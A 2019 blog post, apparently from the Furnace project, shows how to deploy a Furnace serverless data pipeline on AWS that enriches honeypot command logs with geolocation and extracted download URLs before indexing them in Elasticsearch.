Threat Intelligence with Honeypots Part 3: Using Furnace to enrich Honeypot data

Dave Mound
Project Furnace
Published in
10 min readMar 1, 2019
https://furnace.org

Introduction

Over the past few months, we’ve been working on getting Furnace ready to release into Open Source. Over the past few weeks, I’ve been thinking of a blog series that would show it’s capabilities while also trying to have some interesting context behind the data.

So here we are, honeypots and Furnace.

The purpose of this article is to introduce you to Furnace (a platform for rapidly creating streaming data applications), and to show you how it can quickly and easily enable enrichment of data; in this case, gathered from a honeypot. This is just one use case and there are many many more! We encourage you to download it and have a play around to see how it can make your life easier when working with ‘Big Data’.

*Disclaimer* This blog is going to be a little bit of a journey but bear with me … it’ll be worth it :)

TL:DR;

$ npm install @project-furnace/furnace-cli -g$ furnace ignite$ furnace new honey-stack$ git clone https://github.com/DeathsPirate/honeypot-furnace$ cp -R honeypot-furnace/* honey-stack/$ cd honey-stack$ git add .$ git commit -am 'Initial Commit'$ git push origin master

Connect the Commands and Failed Logins log groups from CloudWatch logs to the tap lambda.

Overview

Enriched Honeypot data dashboard

The idea of this blog series is to show how Furnace can rapidly allow us to take data from a source and allow us to work with it easily. We’ll be taking real-time data from honeypots, enriching it, and creating a dashboard for our output. I guess to start with we need to have an understanding of what exactly Furnace does.

Furnace is a framework, driven by a supporting application (currently a CLI), that abstracts away the complexities of deploying data streaming applications in the cloud. It essentially creates a data pipeline using message queues and serverless functions. You describe the data flow and write (or use already existing) modules to work on your data, and Furnace handles the deployment.

As a developer I want to have the following experience:

Write code; Run it; It works!

However if you’ve ever played with any cloud platform you’ll know that isn’t necessarily the case. Generally you’d have to mess around with provisioning infrastructure and services, auth (IAMs etc), creating message-bus queues, worrying about inputs etc etc etc. That’s not what I want as a developer. Furnace takes away a lot of these headaches. It really does allow me to just focus on writing MY code.

To get more information on Furnace please see the main project site at

https://furnace.org

Pre-requisites

If you’d like to follow along with this article then I’ve done an accompanying post about setting up the honeypot in AWS, along with how to create an initial dashboard for the data. That blog post can be found here:

and the accompanying project on GitHub is here:

Installing Furnace is super easy, you’ll need to make sure you have the following setup:

With all that in place we just run:

$ npm install @project-furnace/furnace-cli -g$ furnace ignite

Follow the prompts in the CLI and then wait for your Furnace instance to be spun up in AWS (We are currently working on other platform support), it should take ~3 mins and then you’ll get a notification in the CLI that it’s complete.

With our instance ready we can bootstrap a new stack ready to start coding. That’s a simple case of running $ furnace new pick-a-stack-name Where pick-a-stack-name is of your choosing!

That will create a directory with the minimal files we’ll need, it will also setup a git repo with a webhook needed to deploy the code for us.

Enrichments

With all the pre-reqs out the way it’s time to focus on our enrichments. From our initial records we can definitely extract some meaningful intelligence and also enrich things like the IP address with Geo info so we can make nice pew-pew maps of where the attacks are coming from etc.

Let’s take a look at an example event and see what we can do …

Well we can split out the IP address from the containerName again, we can then do our Geo Lookup on that IP.

What most attackers will try and do is download more scripts and, as we are capturing those commands, it would be handy to extract those URLs and get some info on those domains/IPs too.

By the end of our pipeline our event will look like below:

Geo information will be held in the geo_info section and any domains found in the commands being run will be extracted out into the callouts section. We will break those URLs down further to show schema, port, parameters etc.

The Furnace Stack

A picture speaks a thousand words so here’s what we will be describing in Furnace:

Furnace Stack Design

The blue boxes are the ones we are interested in as a developer, they are our modules. I’ve combined Python and NodeJS modules in the pipeline to show some of the flexibility of Furnace.

This is all we describe from a code point of view. I don’t care how the data gets to my functions, I do care that data gets there, and in the order I specified.

Let’s take a look at the stack.yaml file to see what was generated (If you selected the starter-template when running furnace new {your-stack-name}

We can see the name of our stack (or project); the platform we are targeting (AWS); A default batch size for our messaging (10); The URL for our state repository in GitHub; Finally we see three environments lets talk about those quickly in the next section.

Environments

With the starter-template the stack.yaml file describes three environments

  • Development
  • Staging
  • Production

When we first commit and push our code to GitHub it will be on a development branch. If we want to promote that deployment to the next environment we simply run furnace promote {environment} e.g. furnace promote staging this will handle redeploying the code on a new branch and we’ll end up with an entirely separate environment deployed in the cloud.

Ok, let’s move across the stack now.

Source

Our source in this project is CloudWatch logs. We’ll describe that in the sources.yaml file, let’s take a look at the one from the project:

We give our source a name and it’s type (Kinesis Stream in this case) and a few other params like how many shards we need.

Tap

The tap is our module to do our initial processing of the data. It’s used to parse and normalise. We have json data coming in so we don’t really need to do much processing here, but we will use this module to extract the IP from the containerName field and change the key name for command so we can distinguish between the commands captured by stdin and spyusers. The yaml for our tap look like this:

So basically we name our tap, specify the source and which module we want to load to fulfill this ‘tap’ role (honeytap). If we look at the modules folder we can see the honeytap folder which contains our honeytap module.

Contents of our modules folder

Modules

Now is probably a good time to discuss the modules. As I said before this is where as developers we will be focusing most of our effort. The stack’s yaml files describe how our data should flow but our modules are where we actually write code to act on that data. Presently Furnace supports both NodeJS and Python 3.6 (More language support is on the way!). Each module has it’s own folder in the mainmodules folders and we can use different languages for each module, in my case I have a NodeJS module for doing the Geo lookups and the honeytap and passthru modules are both Python. Let’s take a further look inside a module folder:

Module folder structure

At the root of the module we have two yaml files,module.yaml describes what language the module is written in and some other meta surrounding it, and config.yaml we can place testing and enviroment variables within this file to pull through into our environment.

We also have a src folder and this is where we write our actual code. You can see in the example there is a furnace.py file. This is the entry point file that Furnace will use for the function. All python modules should follow this structure. The file itself at a minimum would look like this:

Furnace will wrap this function with the code necessary to retrieve the messages off the queue, unpack and process them if required then send each event to our function, this means I don’t have to think about that side of it, I can focus on what to do with my event, return it, then Furnace will package it all up and send it down the line to wherever it needs to go. Pretty cool huh!

Don’t worry about remembering all of the above. We’ve provided templates for both NodeJS and Python and they are available from the following repo:

You can download the template then go from there.

OK cool, we’ve got data to our tap. It’s normalised and parsed and ready to go into the pipeline. First lets describe the pipeline then plug it up to our tap with a pipe.

Pipelines

Pipelines are a collection of modules that our data will flow through. The pipelines.yaml for our project looks like so:

Pretty simple, we give our pipeline a name, then list the modules we want to pass the data through in order.

So that was easy, let’s plug this pipeline up to our tap.

Pipes

Pipes are Furnaces connectors. Lets look at the pipes.yaml file:

Again pretty straight-forward, we tell furnace that we want to connect the honeylogs-tap to the enrichment pipeline; then we connect the enrichment pipeline to the es-sink (our elasticsearch instance), lets look at the sink now, its the last piece of our puzzle so if you’ve come this far I’m glad I haven’t bored you yet :)

Sinks

Sinks are where we send data to when it comes out of Furnace, in our case we are using ElasticSearch, lets look at the sinks.yaml file next:

Fairly self explanatory, the important bit here is the resource we define that in our resources.yaml file so Furnace will spin up ElasticSearch for us and then tie the es-sink firehose to it. We’ve also described what we want to call our ES index and the type name we want for our docs.

Resources

The resources.yaml describes things we need outside of our dataflow. We will be storing our honeypot data in ElasticSearch so we can use Furnace to create that for us (If we already had an ElasticSearch instance we could just point the Sink to our ES domain instead)

And that’s it as far as ‘Furnace workings’ goes.

Deployment

Once we’ve written our modules and described our dataflow in the yaml files we can push to Github. This will automatically kick off a deployment and we can check the status by running furnace status

user@somewhere:~/furnace-project$ furnace status
environment dev
timestamp 2019-02-28T16:09:13Z ref master sha 8ec347f2
success
environment staging
environment prod

When our deployment finishes the status will be success and we can finish the last bit by sending the honeypot logs from AWS into our new Furnace stack

Connecting Logs to Lambda

From the CloudWatch logs page in the AWS console select the Commands log group radio button then select the actions dropdown -> Stream to AWS Lambda

Streaming Log Groups to Lambda

Select the tap Lambda, should end in honeylogs-tap-dev , then click next, select json for the format, then next, next, start streaming.

If all went well the log messages will now be flowing through the pipeline and into ES.

Conclusion

With data in ElasticSearch we can now create a nice dash board for our enriched data. We’ve gone from the dashboard in CloudWatch which looked like below:

CloudWatch Dashboard

To a much more enriched dashboard

Furnace data enriched dashboard

Without too much effort. And we can keep expanding our enrichments! How about taking those staging domains and downloading the files in another module to do some forensics on those and then output that data too. Lot’s of ways to go but that’s enough from me for this blog I think :)

Thanks for reading, hopefully I’ve shown you that ‘Big Data’ doesn’t have to be scary!

--

--